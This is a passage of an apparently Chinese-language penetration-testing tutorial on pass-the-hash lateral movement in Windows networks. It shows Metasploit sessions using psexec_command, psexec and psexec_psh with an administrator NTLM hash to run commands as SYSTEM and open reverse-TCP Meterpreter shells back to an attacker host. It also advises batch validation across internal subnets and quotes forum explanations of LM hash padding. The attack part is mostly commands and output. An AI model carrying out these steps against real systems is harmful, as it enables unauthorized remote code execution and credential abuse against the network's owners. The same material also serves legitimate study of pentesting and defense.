msf5 > use auxiliary/admin/smb/psexec_command
msf5 auxiliary(admin/smb/psexec_command) > set rhosts 10.211.55.14
rhosts => 10.211.55.14
msf5 auxiliary(admin/smb/psexec_command) > set smbuser administrator
smbuser => administrator
msf5 auxiliary(admin/smb/psexec_command) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
msf5 auxiliary(admin/smb/psexec_command) > set command "whoami"command => whoami
msf5 auxiliary(admin/smb/psexec_command) > run
[+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.211.55.14:445 - checking if the file is unlocked
[*] 10.211.55.14:445 - Getting the command output...
[*] 10.211.55.14:445 - Executing cleanup...
[+] 10.211.55.14:445 - Cleanup was successful
[+] 10.211.55.14:445 - Command completed successfully!
[*] 10.211.55.14:445 - Output for "whoami":
nt authoritysystem
[*] 10.211.55.14:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
比较鸡肋的是 , 这个模块不支持网段格式批量验证 , 所以实战中可以考虑下面两个模块
exploit/windows/smb/psexec
支持网段格式的IP , 方便批量验证PTH , 下面是单个验证过程:
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 10.211.55.14
rhosts => 10.211.55.14
msf5 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
msf5 exploit(windows/smb/psexec) > set lhost 10.211.55.4
lhost => 10.211.55.4
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.211.55.4:4444
[*] 10.211.55.14:445 - Connecting to the server...
[*] 10.211.55.14:445 - Authenticating to 10.211.55.14:445 as user 'administrator'...
[*] 10.211.55.14:445 - Selecting PowerShell target
[*] 10.211.55.14:445 - Executing the payload...
[+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.211.55.14
[*] Meterpreter session 2 opened (10.211.55.4:4444 -> 10.211.55.14:49168) at 2019-11-24 23:42:38 +0800
meterpreter >
下面网段批量验证效果 , 在内网当做这样验证还是比较实用高效的:
文章插图
关于前面32位的Hash不起作用的疑问 , 去T00ls论坛提问了 , 下面是师傅们的解答:
iceword:前面是lm hash , lm hash已经被弃用了 , 不用来验证 , 所以添啥都行
Hello_C:NTLM Hash = LM Hash + NT Hash , LM Hash是aad3b435b51404eeaad3b435b51404ee时 , 可能密码为空或者没有存储lm hash , 2008默认不存储lm hash 。pth 用nt hash , 有些工具可能需要lm hash:nt hash格式 , 没有lm hash可以使用任意32个字符填充 。
安全客:如果空密码或者不储蓄LM Hash的话 , 我们抓到的LM Hash是AAD3B435B51404EEAAD3B435B51404EE 。所以在win7 中我们看到抓到LM Hash都是AAD3B435B51404EEAAD3B435B51404EE , 这里的LM Hash并没有价值 。
exploit/windows/smb/psexec_psh
msf5 > use exploit/windows/smb/psexec_psh
msf5 exploit(windows/smb/psexec_psh) > set rhosts 10.211.55.14
rhosts => 10.211.55.14
msf5 exploit(windows/smb/psexec_psh) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec_psh) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
msf5 exploit(windows/smb/psexec_psh) > set lhost 10.211.55.4
lhost => 10.211.55.4
msf5 exploit(windows/smb/psexec_psh) > run
[*] Started reverse TCP handler on 10.211.55.4:4444
[*] 10.211.55.14:445 - Executing the payload...
[+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.211.55.14
[*] Meterpreter session 3 opened (10.211.55.4:4444 -> 10.211.55.14:49169) at 2019-11-24 23:44:12 +0800
meterpreter >
这个模块也支持网段批量验证 , 这里就不再赘述了 。
No.5
参考资料
几种windows本地hash值获取和破解详解
推荐阅读
- 电脑右下角弹窗广告怎么关闭win10?windows10桌面弹出广告?
- 如何永久激活Windows10系统专业版教程
- Windows WDS服务安装配置
- 手把手教你用上更好看的新版 Windows开始菜单
- Windows 10 2004版本如何使用小娜?
- Windows 这些没用的设置,我建议你还是趁早关闭吧
- Windows7固态硬盘卡顿假死怎么办?这个方法照做就能轻松解决
- 网络性能debug参数整理
- 人力资源|藏在裁员大数据中的企业密码
- 量子密码技术 量子密码的安全性